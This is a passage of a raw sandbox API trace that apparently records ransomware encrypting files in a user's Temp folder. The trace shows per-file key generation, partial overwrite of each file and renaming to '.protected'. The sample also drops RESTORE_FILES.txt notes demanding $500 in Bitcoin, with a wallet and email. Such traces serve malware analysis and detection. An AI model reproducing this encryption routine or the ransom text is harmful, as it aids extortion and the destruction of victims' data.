lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.953] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.953] CloseHandle (hObject=0xd8) returned 1 [0086.953] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.953] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="Windows") returned -1 [0086.953] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="Program Files") returned 1 [0086.954] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="Program Files (x86)") returned 1 [0086.954] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="$Recycle.bin") returned 1 [0086.954] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="System Volume Information") returned 1 [0086.954] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a") returned 64 [0086.954] StrStrIW (lpFirst="vLvAmCg.m4a", lpSrch=".protected") returned 0x0 [0086.954] lstrcmpW (lpString1="vLvAmCg.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0086.954] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.954] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vlvamcg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a") returned 64 [0086.954] StrStrW (lpFirst="vLvAmCg.m4a", lpSrch=".txt") returned 0x0 [0086.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a") returned 64 [0086.954] StrStrW (lpFirst="vLvAmCg.m4a", lpSrch=".rar") returned 0x0 [0086.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a") returned 64 [0086.955] StrStrW (lpFirst="vLvAmCg.m4a", lpSrch=".zip") returned 0x0 [0086.955] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.955] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.955] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.956] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.956] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.956] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.956] CloseHandle (hObject=0xd8) returned 1 [0086.957] wnsprintfW (in: pszDest=0x504c48, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a.protected") returned 74 [0086.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vlvamcg.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vlvamcg.m4a.protected")) returned 1 [0086.958] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="Windows") returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="Program Files") returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="Program Files (x86)") returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="$Recycle.bin") returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="System Volume Information") returned 1 [0086.958] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE") returned 59 [0086.958] lstrcmpW (lpString1="WPDNSE", lpString2=".") returned 1 [0086.958] lstrcmpW (lpString1="WPDNSE", lpString2="..") returned 1 [0086.958] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\*") returned 61 [0086.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.959] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.959] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.959] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.959] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.959] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.959] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\.") returned 61 [0086.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.959] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.959] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.959] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.959] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.959] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.959] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.959] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\..") returned 62 [0086.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.959] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.959] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.960] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\RESTORE_FILES.txt") returned 77 [0086.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wpdnse\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.960] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.960] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.961] lstrlenA (lpString="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") returned 684 [0086.961] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) 
returned 1 [0086.961] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.961] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.961] CloseHandle (hObject=0xd8) returned 1 [0086.962] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="Windows") returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="Program Files") returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="Program Files (x86)") returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="$Recycle.bin") returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="System Volume Information") returned 1 [0086.962] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp") returned 72 [0086.962] StrStrIW (lpFirst="yyeSBWgqBuJy2hT.bmp", lpSrch=".protected") returned 0x0 [0086.962] lstrcmpW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0086.962] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.962] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\temp\\yyesbwgqbujy2ht.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp") returned 72 [0086.963] StrStrW (lpFirst="yyeSBWgqBuJy2hT.bmp", lpSrch=".txt") returned 0x0 [0086.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp") returned 72 [0086.963] StrStrW (lpFirst="yyeSBWgqBuJy2hT.bmp", lpSrch=".rar") returned 0x0 [0086.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp") returned 72 [0086.963] StrStrW (lpFirst="yyeSBWgqBuJy2hT.bmp", lpSrch=".zip") returned 0x0 [0086.963] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.964] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.964] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.964] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.964] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.964] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.965] CloseHandle (hObject=0xd8) returned 1 [0086.965] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp.protected") returned 82 [0086.965] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yyesbwgqbujy2ht.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yyesbwgqbujy2ht.bmp.protected")) returned 1 [0086.966] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="Windows") returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="Program Files") returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="Program Files (x86)") returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="$Recycle.bin") returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="System Volume Information") returned 1 [0086.967] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav") returned 63 [0086.967] StrStrIW (lpFirst="ZfQWOW.wav", lpSrch=".protected") returned 0x0 [0086.967] lstrcmpW (lpString1="ZfQWOW.wav", lpString2="RESTORE_FILES.txt") returned 1 [0086.967] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.967] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.967] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zfqwow.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.967] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav") returned 63 [0086.967] StrStrW (lpFirst="ZfQWOW.wav", lpSrch=".txt") returned 0x0 [0086.967] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav") returned 63 [0086.968] StrStrW (lpFirst="ZfQWOW.wav", lpSrch=".rar") returned 0x0 [0086.968] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav") returned 63 [0086.968] StrStrW (lpFirst="ZfQWOW.wav", lpSrch=".zip") returned 0x0 [0086.968] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.968] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.969] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.969] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.969] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.969] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.969] CloseHandle (hObject=0xd8) returned 1 [0086.970] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav.protected") returned 73 [0086.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zfqwow.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zfqwow.wav.protected")) returned 1 [0086.971] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="Windows") returned -1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="Program Files") returned -1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="Program Files (x86)") returned -1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="$Recycle.bin") returned 1 [0086.971] lstrcmpiW (lpString1="~nsu.tmp", lpString2="System Volume Information") returned -1 [0086.971] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp") returned 61 [0086.971] lstrcmpW (lpString1="~nsu.tmp", lpString2=".") returned 1 [0086.971] lstrcmpW (lpString1="~nsu.tmp", lpString2="..") returned 1 [0086.971] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\*") returned 63 [0086.971] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\*", lpFindFileData=0x295ea40 | 
out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.972] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.972] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.972] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.972] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.973] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.973] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\.") returned 63 [0086.973] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.973] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.973] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.973] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.973] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.973] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.973] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.973] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\..") returned 64 [0086.973] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.973] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.973] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.973] lstrcmpiW (lpString1="Au_.exe", lpString2="Windows") returned -1 [0086.973] lstrcmpiW (lpString1="Au_.exe", lpString2="Program Files") returned -1 [0086.973] lstrcmpiW (lpString1="Au_.exe", lpString2="Program Files (x86)") returned -1 [0086.973] lstrcmpiW (lpString1="Au_.exe", lpString2="$Recycle.bin") returned 1 [0086.973] lstrcmpiW (lpString1="Au_.exe", 
lpString2="System Volume Information") returned -1 [0086.973] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe") returned 69 [0086.973] StrStrIW (lpFirst="Au_.exe", lpSrch=".protected") returned 0x0 [0086.973] lstrcmpW (lpString1="Au_.exe", lpString2="RESTORE_FILES.txt") returned -1 [0086.973] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.973] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\~nsu.tmp\\au_.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.974] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe") returned 69 [0086.974] StrStrW (lpFirst="Au_.exe", lpSrch=".txt") returned 0x0 [0086.974] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe") returned 69 [0086.974] StrStrW (lpFirst="Au_.exe", lpSrch=".rar") returned 0x0 [0086.974] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\Au_.exe") returned 69 [0086.974] StrStrW (lpFirst="Au_.exe", lpSrch=".zip") returned 0x0 [0086.974] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0086.975] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.975] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0086.975] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.975] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0086.976] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 